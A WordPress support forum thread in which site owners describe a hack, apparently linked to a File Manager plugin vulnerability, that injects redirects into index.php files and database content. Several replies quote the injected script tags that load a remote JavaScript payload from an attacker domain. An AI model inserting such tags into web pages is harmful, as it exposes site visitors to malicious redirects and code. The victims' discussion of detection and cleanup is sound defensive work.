Viewing 15 replies - 1 through 15 (of 48 total)
  • Me too, Pro and same malware

    same issue here.

    I believe need a solution by wordfence team ?

    me too

    same. it looks like, for me at least, it was an issue with WP file manager https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/

    Not sure if it can be removed on the instance. If anyone knows how, please advise

    Please check if there is a folder named mu-plugins in /wp-content
    I this maybe this is the trigger

    Doesn’t seem like I have that in /wp-content or /plugins. It still redirects even after deleting wp-file-manager folder from /plugins

    same here! what should be done??? this is funny that a security plugin is hacked!

    A malicious script is injected into all index files! And it is a huge disruption! Everyone take a look and see if this is true?

    the code is

    
    <script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script><script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
    

    ??

    • This reply was modified 4 years, 2 months ago by Yui. Reason: please use CODE button for proper formatting

    What I believe…

    if you have a backup copy … then… delete everything in you host and re install word press and import your recent copy.

    this is the fastest way

    Regards,

    Yes.
    The only way to get rid of this seems to be a clean restore. Hopefully I had one. We are all waiting for a comment by the Wordfence team about this issue.

    Thread Starter audiovalve

    (@audiovalve)

    3 week ago we was hacked without wordfence and other redirections. My Pakistan freelancer help me to solf the probs free weeks ago and today too, he work on it. The situation in no longer funny, I go in maintanace mode and wait result. Sometimes I wish me back times with “html” …
    One more, more index.php files was hacked outside from WP and implemante a new 1 line. I all delete them and so I better change server ftp access. I inform you what my guy can solf all its probs, today or tomorow.
    My guy think, its a out dated plugin ??!!

    regards, Helmut

    It also infects the wp_post data base, php files an js. It is a complete mess

    Last Friday the script was

    
    <script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
    

    Today it change to

    
    <script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>  
    

    also de ns1 changes sometimes to ns5

    • This reply was modified 4 years, 2 months ago by Yui. Reason: please use CODE button for proper formatting

    Hello all, I was working on audiovalves (Hemluts) website.I have completely removed that malicious script from his website and his website is back now. If anyone needs help. I can help. Thank you

    audiovalve.info

    same issue at exactly time??? I have this on a site I managed Too much times it redirect

    • This reply was modified 4 years, 2 months ago by ZaacWilliam.
    • This reply was modified 4 years, 2 months ago by Yui. Reason: link removed

    Hi @khubaib927
    Before restoring my backup, I removed the script too, from almost 140 index.php files! It was a hectic job but I made it. I was happy… till it came alive again! There seemingly are some other files that I don’t know where they belong to. I looked inside my plugins and I found some weird folders with suspicious files. I just made my decision and restored my website.

    I removed the Wordfence plugin too!

    anyone with any other solution?

Viewing 15 replies - 1 through 15 (of 48 total)
  • The topic ‘wordfence not really safe my site, now redirected’ is closed to new replies.